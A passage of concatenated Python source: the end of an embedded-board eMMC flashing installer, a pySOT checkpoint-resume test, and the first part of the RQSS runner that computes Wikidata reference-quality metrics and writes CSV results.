            copyResult.clear()
            cliBck = CliViewer()
            bckparam = {'cmd': 'flash', 'src_filename': targets[int(tgtNum)][2]['device_node'], 'tgt_filename': '/tmp/rescue.img', 'src_total_sectors': '{}'.format(partblocks), 'chunk_size': '32768'}
            cliBck.request(bckparam)
            copyResult.update(cliBck.getResult())
            del cliBck
            break
        elif yn.lower() == 'no' or yn.lower() == 'n' or yn.lower() == 'quit' or yn.lower() == 'q':
            startstop_guiclientd(1)
            exit(1)
    # step 8: parse the result in a loop until result['status'] != 'processing'
    # (loopResult polls cliDl in a background thread while the blocking
    # download request runs here)
    endEvent = Event()
    endEvent.clear()
    resultThread = Thread(name='ResultThread', target=loopResult, args=(cliDl, endEvent))
    resultThread.start()
    cliDl.request(dlparam)
    dlResult.update(cliDl.getResult())
    time.sleep(1)
    endEvent.set()
    resultThread.join()
    del cliDl
    if dlResult['status'] == 'success':
        print('Flash complete...', end=((' '*60) + '\n'))
    else:
        # step 9: restore rescue system on target storage if failed to flash
        print('Flash failed, recover rescue system...', end=((' '*60) + '\n'))
        copyResult.clear()
        cliRecover = CliViewer()
        recoverparam = {'cmd': 'flash', 'tgt_filename': targets[int(tgtNum)][2]['device_node'], 'src_filename': '/tmp/rescue.img', 'src_total_sectors': '{}'.format(partblocks), 'chunk_size': '32768'}
        cliRecover.request(recoverparam)
        copyResult.update(cliRecover.getResult())
        del cliRecover
        if 'status' in copyResult and copyResult['status'] == 'success':
            print('Exit installer now, please try again later...')
        else:
            print('Critical Error, cannot restore rescue partition...')
        exit(1)
    # step 10: enable/disable the mmc boot option, and clear the boot partition if it is disabled
    if 'androidthings' not in dlparam['dl_url']:
        print('Disable mmc boot partition readonly...')
        # python3 view.py {config mmc -c readonly -s enable/disable -n 1 /dev/mmcblk2}
        cliCfg = CliViewer()
        cfgparam = {'cmd': 'config', 'subcmd': 'mmc', 'config_id': 'readonly', \
                    'config_action': 'disable', 'boot_part_no': '1', 'target': dlparam['tgt_filename']}
        cliCfg.request(cfgparam)
        del cliCfg
        cliFlash = CliViewer()
        flashparam = {'cmd': 'flash', 'src_filename': '/dev/zero', 'tgt_filename': dlparam['tgt_filename'] + 'boot0'}
        print('Clear mmc boot partition...')
        endEvent = Event()
        endEvent.clear()
        resultThread = Thread(name='ResultThread', target=loopResult, args=(cliFlash, endEvent))
        resultThread.start()
        cliFlash.request(flashparam)
        time.sleep(1)
        endEvent.set()
        resultThread.join()
        print('Clear complete...', end=((' '*60) + '\n'))
        del cliFlash
    cliCfg = CliViewer()
    # python3 view.py {config mmc -c bootpart -s enable/disable -n 1 -k 1 /dev/mmcblk2}
    cfgparam = {'cmd': 'config', 'subcmd': 'mmc', 'config_id': 'bootpart', \
                'config_action': 'enable' if 'androidthings' in dlparam['dl_url'] else 'disable', \
                'boot_part_no': '1', 'send_ack': '1', 'target': dlparam['tgt_filename']}
    print('{} mmc boot partition configuration...'.format('Enable' if 'androidthings' in dlparam['dl_url'] else 'Disable'))
    cliCfg.request(cfgparam)
    del cliCfg
    # step 11: a message to tell user what to do next
    print('Please set the boot jumper to BOOT MODE and reboot your board...')
if __name__ == "__main__":
startstop_guiclientd(0)
main()
|
test_controller.py | from pySOT.experimental_design import SymmetricLatinHypercube
from pySOT.strategy import DYCORSStrategy
from pySOT.surrogate import RBFInterpolant, CubicKernel, LinearTail
from pySOT.optimization_problems import Ackley
from pySOT.controller import CheckpointController
from poap.controller import SerialController
import numpy as np
import multiprocessing
import time
import os
import pytest
np.random.seed(0)
max_evals = 300
ackley = Ackley(dim=10)
fname = "checkpoint.pysot"
def check_strategy(controller):
    """Make sure the strategy object is correct."""
    strategy = controller.strategy

    # Check the strategy object
    assert strategy.num_evals <= strategy.max_evals
    assert strategy.phase == 2
    assert strategy.init_pending == 0
    assert strategy.pending_evals == 0
    assert strategy.X.shape == (strategy.num_evals, ackley.dim)
    assert strategy.fX.shape == (strategy.num_evals, 1)
    assert strategy.Xpend.shape == (0, ackley.dim)
    assert len(strategy.fevals) == strategy.num_evals

    # Check that all evaluations are in the surrogate model
    assert strategy.surrogate.num_pts == strategy.num_evals
    assert np.all(strategy.X == strategy.surrogate.X)
    assert np.all(strategy.fX == strategy.surrogate.fX)

    # Check that the strategy and controller have the same information
    assert len(controller.fevals) == strategy.num_evals
    for i in range(strategy.num_evals):
        feval = controller.fevals[i]
        if feval.status == 'completed':
            idx = np.where((strategy.X == feval.params[0]).all(axis=1))[0]
            assert len(idx) == 1
            assert np.all(feval.params[0] == strategy.X[idx, :])
            assert feval.value == strategy.fX[idx]
            assert np.all(feval.params[0] <= ackley.ub)
            assert np.all(feval.params[0] >= ackley.lb)
def test_checkpoint_serial():
    # Start from a clean slate: remove any stale checkpoint file
    if os.path.isfile(fname):
        os.remove(fname)

    # Run for 1 seconds and kill the controller
    worker = multiprocessing.Process(target=init_serial, args=())
    worker.start()
    time.sleep(3)
    worker.terminate()
    worker.join()

    # Resume the run
    resume(SerialController(ackley.eval))
def init_serial():
    # Build the surrogate model and the experimental design
    surrogate = RBFInterpolant(
        dim=ackley.dim, kernel=CubicKernel(),
        tail=LinearTail(ackley.dim))
    design = SymmetricLatinHypercube(
        dim=ackley.dim, num_pts=2 * (ackley.dim + 1))

    # Create a strategy and a controller
    serial = SerialController(ackley.eval)
    serial.strategy = DYCORSStrategy(
        max_evals=max_evals, opt_prob=ackley, exp_design=design,
        surrogate=surrogate, asynchronous=True)

    # Wrap controller in checkpoint object and run until terminated
    CheckpointController(serial, fname=fname).run()
def resume(controller):
    # Wrap controller in checkpoint object
    checkpoint = CheckpointController(controller, fname=fname)
    result = checkpoint.resume()
    # To make sure performance is the same
    assert result.value < 2.0
    check_strategy(checkpoint.controller)
    # Try to resume again and make sure an exception is raised
    with pytest.raises(IOError):
        result = checkpoint.run()
# Allow running this test module directly, without pytest.
if __name__ == '__main__':
    test_checkpoint_serial()
|
RQSS_Framework_Runner.py | import csv
import os
import sys
from argparse import ArgumentParser
from datetime import datetime
from multiprocessing.context import Process
from pathlib import Path
from typing import List, NamedTuple, Optional, Union
import pandas as pd
from Accuracy.LiteralSyntaxChecking import WikibaseRefLiteralSyntaxChecker
from Accuracy.TripleSemanticChecking import (FactReference,
RefTripleSemanticChecker)
from Accuracy.TripleSyntaxChecking import WikibaseRefTripleSyntaxChecker
from Availability.DereferencePossibility import DerefrenceExplorer
from Believability.HumanReferenceInItemChecking import *
from Completeness.ClassesPropertiesSchemaCompletenessChecking import *
from Conciseness.ReferenceSharingChecking import *
from Consistency.RefPropertiesConsistencyChecking import \
RefPropertiesConsistencyChecker
from Consistency.TriplesRangeConsistencyChecking import \
TriplesRangeConsistencyChecker
from Currency.ExternalURIsFreshnessChecking import *
from Currency.ReferenceFreshnessChecking import *
from EntitySchemaExtractor import EidRefSummary, RefedFactRef
from Licensing.LicenseExistanceChecking import LicenseChecker
from Objectivity.MultipleReferenceChecking import *
from Queries import RQSS_QUERIES
from Reputation.DNSBLBlacklistedChecking import DNSBLBlacklistedChecker
from Security.TLSExistanceChecking import TLSChecker
from Timeliness.ExternalURIsTimelinessChecking import *
from Volatility.ExternalURIsVolatilityChecking import *
def genargs(prog: Optional[str] = None) -> ArgumentParser:
    """Build the command-line parser for the RQSS framework runner.

    Parameters
    ----------
    prog : Optional[str]
        Program name forwarded to ArgumentParser (None means sys.argv[0]).

    Returns
    -------
    ArgumentParser
        Parser with one positional data directory plus one flag per metric.
    """
    parser = ArgumentParser(prog)
    parser.add_argument(
        "data_dir", help="Input data directory that includes initial collections like facts, properties, literals, external sources, etc.")
    parser.add_argument(
        "--endpoint", help="The local/public endpoint of the dataset for shex-based metrics", required=False)
    # NOTE(review): `datetime.datetime` relies on one of the star-imports
    # above exposing the datetime *module* (the top-of-file
    # `from datetime import datetime` alone would not provide it) — the
    # whole file uses this spelling consistently, so it is kept.
    # Help-text typos fixed: "reivision" -> "revision", "deafult" -> "default".
    parser.add_argument(
        "--upper-date", help="The upper date (Format DD-MM-YYYY) limit for revision history checker metrics. The default is now()", required=False, type=lambda d: datetime.datetime.strptime(d, "%d-%m-%Y"), default=datetime.datetime.now())
    # os.path.join instead of manual separator concatenation
    parser.add_argument(
        "-o", "--output-dir", help="Output destination directory to store computed metrics details", default=os.path.join(os.getcwd(), 'rqss_framework_output'))
    parser.add_argument("-dp", "--dereferencing",
                        help="Compute the metric: Dereference Possibility of the External URIs", action='store_true')
    parser.add_argument("-l", "--licensing",
                        help="Compute the metric: External Sources’ Datasets Licensing", action='store_true')
    parser.add_argument("-sec", "--security",
                        help="Compute the metric: Link Security of the External URIs", action='store_true')
    parser.add_argument("-rts", "--ref-triple-syntax",
                        help="Compute the metric: Syntactic Validity of Reference Triples", action='store_true')
    parser.add_argument("-rls", "--ref-literal-syntax",
                        help="Compute the metric: Syntactic validity of references’ literals", action='store_true')
    parser.add_argument("-rtm", "--ref-triple-semantic",
                        help="Compute the metric: Semantic validity of reference triples", action='store_true')
    parser.add_argument("-rpc", "--ref-property-consistency",
                        help="Compute the metric: Consistency of references’ properties", action='store_true')
    parser.add_argument("-rc", "--range-consistency",
                        help="Compute the metric: Range consistency of reference triples", action='store_true')
    parser.add_argument("-rs", "--ref-sharing",
                        help="Compute the metric: Ratio of reference sharing", action='store_true')
    parser.add_argument("-rdns", "--reputation",
                        help="Compute the metric: External sources’ domain reputation", action='store_true')
    parser.add_argument("-mr", "--multiple-ref",
                        help="Compute the metric: Multiple references for facts", action='store_true')
    parser.add_argument("-ha", "--human-added",
                        help="Compute the metric: Human-added references ratio", action='store_true')
    parser.add_argument("-rf", "--ref-freshness",
                        help="Compute the metric: Freshness of fact referencing", action='store_true')
    parser.add_argument("-ef", "--ext-uris-freshness",
                        help="Compute the metric: Freshness of external sources", action='store_true')
    freshness_group = parser.add_argument_group(
        title='options for computing freshness of external sources')
    freshness_group.add_argument(
        "--extract-google-cache", help="Set to extract google cache info for freshness of external sources", action='store_true')
    parser.add_argument("-ev", "--ext-uris-volatility",
                        help="Compute the metric: Volatility of external sources", action='store_true')
    parser.add_argument("-et", "--ext-uris-timeliness",
                        help="Compute the metric: Timeliness of external sources. The metric will use the results of the metrics Freshness of external sources and Volatility of external sources. Make sure the results of the two metric is in the --output-dir argument", action='store_true')
    parser.add_argument("-cpsc", "--class-property-schema-completeness",
                        help="Compute the metric: Schema completeness of references", action='store_true')
    return parser
def write_results_to_CSV(results: List[NamedTuple], output_file: str) -> None:
    """Serialise metric results to *output_file* as CSV.

    If *results* is a plain string (the checkers' summary/ratio repr) it is
    written verbatim. Otherwise *results* must be a non-empty list of
    NamedTuples: the field names become the header row and ``None`` values
    are rendered as the literal ``'<None>'``.
    """
    with open(output_file, 'w', newline='') as f:
        if isinstance(results, str):
            f.write(results)
            return
        w = csv.writer(
            f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        # write header from NamedTuple fields
        w.writerow(list(results[0]._fields))
        for result in results:
            record = result._asdict()  # build the mapping once per row
            # `is None` (identity), not `== None`
            row = ['<None>' if record[field] is None else record[field]
                   for field in result._fields]
            w.writerow(row)
    return
def compute_dereferencing(opts: ArgumentParser) -> int:
    """Compute the metric: Dereference Possibility of the External URIs.

    Reads 'external_uris.data' from opts.data_dir, runs DerefrenceExplorer,
    writes per-URI results and the summary ratio into opts.output_dir.
    Returns 0 on success; exits the process if the input file is missing.
    """
    print('Started computing Metric: Dereference Possibility of the External URIs')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'external_uris.data')
    output_file_dist = os.path.join(opts.output_dir, 'dereferencing.csv')
    output_file_result = os.path.join(opts.output_dir, 'dereferencing_ratio.csv')
    # reading the extracted External URIs
    print('Reading data ...')
    try:
        with open(input_data_file, encoding="utf8") as file:
            uris = [line.rstrip() for line in file]
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"external_uris.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    deref_checker = DerefrenceExplorer(uris)
    results = deref_checker.check_dereferencies()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(results, output_file_dist)
        write_results_to_CSV(str(deref_checker), output_file_result)
        print('Metric: Dereference Possibility of the External URIs results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Dereference Possibility of the External URIs, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_licensing(opts: ArgumentParser) -> int:
    """Compute the metric: External Sources' Datasets Licensing.

    Reads 'external_uris.data' from opts.data_dir, runs LicenseChecker,
    writes per-URI results and the summary ratio into opts.output_dir.
    Returns 0 on success; exits the process if the input file is missing.
    """
    print('Started computing Metric: External Sources’ Datasets Licensing')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'external_uris.data')
    output_file_dist = os.path.join(opts.output_dir, 'licensing.csv')
    output_file_result = os.path.join(opts.output_dir, 'licensing_ratio.csv')
    # reading the extracted External URIs
    print('Reading data ...')
    try:
        with open(input_data_file, encoding="utf8") as file:
            uris = [line.rstrip() for line in file]
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"external_uris.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    lic_checker = LicenseChecker(uris)
    results = lic_checker.check_license_existance()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(results, output_file_dist)
        write_results_to_CSV(str(lic_checker), output_file_result)
        print('Metric: External Sources’ Datasets Licensing results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: External Sources’ Datasets Licensing, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_security(opts: ArgumentParser) -> int:
    """Compute the metric: Link Security of the External URIs.

    Reads 'external_uris.data' from opts.data_dir, runs TLSChecker,
    writes per-URI results and the summary ratio into opts.output_dir.
    Returns 0 on success; exits the process if the input file is missing.
    """
    print('Started computing Metric: Link Security of the External URIs')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'external_uris.data')
    output_file_dist = os.path.join(opts.output_dir, 'security.csv')
    output_file_result = os.path.join(opts.output_dir, 'security_ratio.csv')
    # reading the extracted External URIs
    print('Reading data ...')
    try:
        with open(input_data_file, encoding="utf8") as file:
            uris = [line.rstrip() for line in file]
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"external_uris.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    sec_checker = TLSChecker(uris)
    results = sec_checker.check_support_tls()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(results, output_file_dist)
        write_results_to_CSV(str(sec_checker), output_file_result)
        print('Metric: Link Security of the External URIs results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Link Security of the External URIs, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_ref_triple_syntax(opts: ArgumentParser) -> int:
    """Compute the metric: Syntactic Validity of Reference Triples.

    Requires --endpoint; without it the metric is skipped (previously this
    raised NameError because `results` was never assigned). Returns 0 on
    success; exits the process if the input file is missing.
    """
    print('Started computing Metric: Syntactic Validity of Reference Triples')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'statement_nodes_uris.data')
    output_file = os.path.join(opts.output_dir, 'ref_triple_syntax_result.csv')
    # reading the statement nodes data
    print('Reading data ...')
    try:
        with open(input_data_file, encoding="utf8") as file:
            statements = [line.rstrip() for line in file]
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"statement_nodes_uris.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    shex_checker = None
    results = []  # BUGFIX: was undefined when --endpoint is absent
    if opts.endpoint:
        shex_checker = WikibaseRefTripleSyntaxChecker(
            statements, opts.endpoint, None)
        results = shex_checker.check_shex_over_endpoint()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(str(shex_checker), output_file)
        print('Metric: Syntactic Validity of Reference Triples results have been written in the file: {0}'.format(
            output_file))
    print('DONE. Metric: Syntactic Validity of Reference Triples, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_ref_literal_syntax(opts: ArgumentParser) -> int:
    """Compute the metric: Syntactic validity of references' literals.

    Reads 'reference_literals.data' (CSV of property,literal rows), groups
    literals per property, runs WikibaseRefLiteralSyntaxChecker and writes
    the distribution and ratio files. Returns 0 on success; exits the
    process if the input file is missing.
    """
    print('Started computing Metric: Syntactic validity of references’ literals')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'reference_literals.data')
    output_file_dist = os.path.join(opts.output_dir, 'ref_literal_syntax.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'ref_literal_syntax_ratio.csv')
    # reading the properties/literals
    print('Reading data ...')
    prop_values = {}
    try:
        with open(input_data_file, encoding="utf8") as file:
            for row in csv.reader(file):
                # setdefault replaces the manual membership-check/init pair
                prop_values.setdefault(str(row[0]), []).append(row[1])
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"reference_literals.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    lit_checker = WikibaseRefLiteralSyntaxChecker(prop_values)
    results = lit_checker.check_literals_regex()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(results, output_file_dist)
        write_results_to_CSV(str(lit_checker), output_file_result)
        print('Metric: Syntactic validity of references’ literals results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Syntactic validity of references’ literals, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_ref_triple_semantic(opts: ArgumentParser) -> int:
    """Compute the metric: Semantic validity of reference triples.

    Reads fact/reference triples plus a gold-standard set from opts.data_dir
    and checks semantic validity against the gold standard. Returns 0 on
    success; exits the process if either input file is missing.
    """
    print('Started computing Metric: Semantic validity of reference triples')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'fact_ref_triples.data')
    input_gold_standard_file = os.path.join(
        opts.data_dir, 'semantic_validity_gs.data')
    output_file = os.path.join(opts.output_dir, 'semantic_validity.csv')
    # reading the fact/reference triples
    print('Reading data ...')
    fact_refs = []
    try:
        with open(input_data_file, encoding="utf8") as file:
            for row in csv.reader(file):
                fact_refs.append(FactReference(row[0], row[1], row[2], row[3]))
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"fact_ref_triples.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # reading the gold standard set
    print('Reading gold standard set ...')
    gs_fact_refs = []
    try:
        with open(input_gold_standard_file, encoding="utf8") as file:
            for row in csv.reader(file):
                gs_fact_refs.append(FactReference(
                    row[0], row[1], row[2], row[3]))
    except FileNotFoundError:
        print("Error: Gold Standard Set file not found. Provide gold standard data file with name: {0} in data_dir".format(
            '"semantic_validity_gs.data"'))
        sys.exit(1)
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    results = RefTripleSemanticChecker(
        gs_fact_refs, fact_refs).check_semantic_to_gold_standard()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    # BUGFIX: completion messages previously named the wrong metric
    # ("Syntactic validity of references' literals" — a copy-paste error).
    if len(results) > 0:
        write_results_to_CSV(results, output_file)
        print('Metric: Semantic validity of reference triples results have been written in the file: {0}'.format(
            output_file))
    print('DONE. Metric: Semantic validity of reference triples, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_ref_properties_consistency(opts: ArgumentParser) -> int:
    """Compute the metric: Consistency of references' properties.

    Reads 'ref_properties.data' from opts.data_dir and checks each property's
    reference-specificity against Wikidata. Returns 0 on success; exits the
    process if the input file is missing.
    """
    print('Started computing Metric: Consistency of references’ properties')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'ref_properties.data')
    output_file_dist = os.path.join(
        opts.output_dir, 'ref_properties_consistency.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'ref_properties_consistency_ratio.csv')
    # reading the extracted reference properties
    print('Reading data ...')
    try:
        with open(input_data_file, encoding="utf8") as file:
            props = [line.rstrip() for line in file]
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"ref_properties.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    cons_checker = RefPropertiesConsistencyChecker(props)
    # method name kept as declared by the checker class (misspelling included)
    results = cons_checker.check_reference_specificity_from_Wikdiata()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(results, output_file_dist)
        write_results_to_CSV(str(cons_checker), output_file_result)
        print('Metric: Consistency of references’ properties results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Consistency of references’ properties, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_range_consistency(opts: ArgumentParser) -> int:
    """Compute the metric: Range consistency of reference triples.

    Reads 'ref_properties_object_value.data' (CSV of property,value rows),
    groups values per property and checks them against the property ranges.
    Returns 0 on success; exits the process if the input file is missing.
    """
    print('Started computing Metric: Range consistency of reference triples')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(
        opts.data_dir, 'ref_properties_object_value.data')
    output_file_dist = os.path.join(opts.output_dir, 'range_consistency.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'range_consistency_ratio.csv')
    # reading the properties/values
    print('Reading data ...')
    prop_values = {}
    try:
        with open(input_data_file, encoding="utf8") as file:
            for row in csv.reader(file):
                # setdefault replaces the manual membership-check/init pair
                prop_values.setdefault(str(row[0]), []).append(row[1])
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"ref_properties_object_value.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    range_checker = TriplesRangeConsistencyChecker(prop_values)
    results = range_checker.check_all_value_ranges()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(results, output_file_dist)
        write_results_to_CSV(str(range_checker), output_file_result)
        print('Metric: Range consistency of reference triples results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Range consistency of reference triples, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_ref_sharing_ratio(opts: ArgumentParser) -> int:
    """Compute the metric: Ratio of reference sharing.

    Reads 'ref_nodes_incomings.data' (CSV of reference node, incoming count)
    and counts references shared by multiple statements. Returns 0 on
    success; exits the process if the input file is missing.
    """
    print('Started computing Metric: Ratio of reference sharing')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'ref_nodes_incomings.data')
    output_file_dist = os.path.join(opts.output_dir, 'ref_sharing.csv')
    output_file_result = os.path.join(opts.output_dir, 'ref_sharing_ratio.csv')
    # reading the reference nodes data
    print('Reading data ...')
    ref_nodes = []
    try:
        with open(input_data_file, encoding="utf8") as file:
            for row in csv.reader(file):
                # NOTE(review): RefNodeIncomings comes from a star import —
                # confirm in Conciseness.ReferenceSharingChecking.
                ref_nodes.append(RefNodeIncomings(row[0], row[1]))
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"ref_nodes_incomings.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    checker = ReferenceSharingChecker(ref_nodes)
    shared_refs = checker.count_seperate_shared_references()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(shared_refs) > 0:
        write_results_to_CSV(shared_refs, output_file_dist)
        write_results_to_CSV(str(checker), output_file_result)
        print('Metric: Ratio of reference sharing results have been written in the files: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Ratio of reference sharing, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_dnsbl_reputation(opts: ArgumentParser) -> int:
    """Compute the metric: External sources' domain reputation.

    Reads 'external_uris.data' from opts.data_dir and checks each domain
    against DNS blacklists. Returns 0 on success; exits the process if the
    input file is missing.
    """
    print('Started computing Metric: External sources’ domain reputation')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'external_uris.data')
    output_file_dist = os.path.join(opts.output_dir, 'dnsbl_reputation.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'dnsbl_reputation_ratio.csv')
    # reading the extracted External URIs
    print('Reading data ...')
    try:
        with open(input_data_file, encoding="utf8") as file:
            uris = [line.rstrip() for line in file]
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"external_uris.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    dnsbl_checker = DNSBLBlacklistedChecker(uris)
    results = dnsbl_checker.check_domain_blacklisted()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(results, output_file_dist)
        write_results_to_CSV(str(dnsbl_checker), output_file_result)
        print('Metric: External sources’ domain reputation results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: External sources’ domain reputation, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_multiple_referenced(opts: ArgumentParser) -> int:
    """Compute the metric: Multiple references for facts.

    Reads 'statement_node_ref_num.data' (CSV of statement node, reference
    count) and counts statements with more than one reference. Returns 0 on
    success; exits the process if the input file is missing.
    """
    print('Started computing Metric: Multiple references for facts')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(
        opts.data_dir, 'statement_node_ref_num.data')
    output_file_dist = os.path.join(opts.output_dir, 'multiple_refs.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'multiple_refs_ratio.csv')
    # reading the statement nodes data
    print('Reading data ...')
    statements = []
    try:
        with open(input_data_file, encoding="utf8") as file:
            for row in csv.reader(file):
                # NOTE(review): StatementRefNum comes from a star import —
                # confirm in Objectivity.MultipleReferenceChecking.
                statements.append(StatementRefNum(row[0], row[1]))
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"statement_node_ref_num.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    checker = MultipleReferenceChecker(statements)
    multiples = checker.count_seperate_multiple_referenced_statements()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(multiples) > 0:
        write_results_to_CSV(multiples, output_file_dist)
        write_results_to_CSV(str(checker), output_file_result)
        print('Metric: Multiple references for facts results have been written in the files: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Multiple references for facts, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_human_added_references_per_item(opts: ArgumentParser) -> int:
    """Compute the metric: Human-added references ratio.

    Reads 'item_refed_facts.data' (CSV of item,fact rows), groups referenced
    facts per item and checks revision history up to opts.upper_date for
    human-added references. Returns 0 on success; exits the process if the
    input file is missing.
    """
    print('Started computing Metric: Human-added references ratio')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'item_refed_facts.data')
    output_file_dist = os.path.join(opts.output_dir, 'human_added.csv')
    output_file_result = os.path.join(opts.output_dir, 'human_added_ratio.csv')
    # reading the item/referenced-fact pairs
    print('Reading data ...')
    item_refed_facts = {}
    try:
        with open(input_data_file, encoding="utf8") as file:
            for row in csv.reader(file):
                # setdefault replaces the manual membership-check/init pair
                item_refed_facts.setdefault(str(row[0]), []).append(row[1])
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"item_refed_facts.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    human_added_checker = HumanReferenceInItemChecker(
        item_refed_facts, opts.upper_date)
    dist = human_added_checker.check_referenced_facts_human_added()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(dist) > 0:
        write_results_to_CSV(dist, output_file_dist)
        write_results_to_CSV(str(human_added_checker), output_file_result)
        print('Metric: Human-added references ratio results have been written in the files: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Human-added references ratio, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_referenced_facts_reference_freshness_per_item(opts: ArgumentParser) -> int:
    """Compute the metric: Freshness of fact referencing.

    Reads 'item_refed_facts.data' (CSV of item,fact rows), groups referenced
    facts per item and evaluates referencing freshness up to opts.upper_date.
    Returns 0 on success; exits the process if the input file is missing.
    """
    print('Started computing Metric: Freshness of fact referencing')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'item_refed_facts.data')
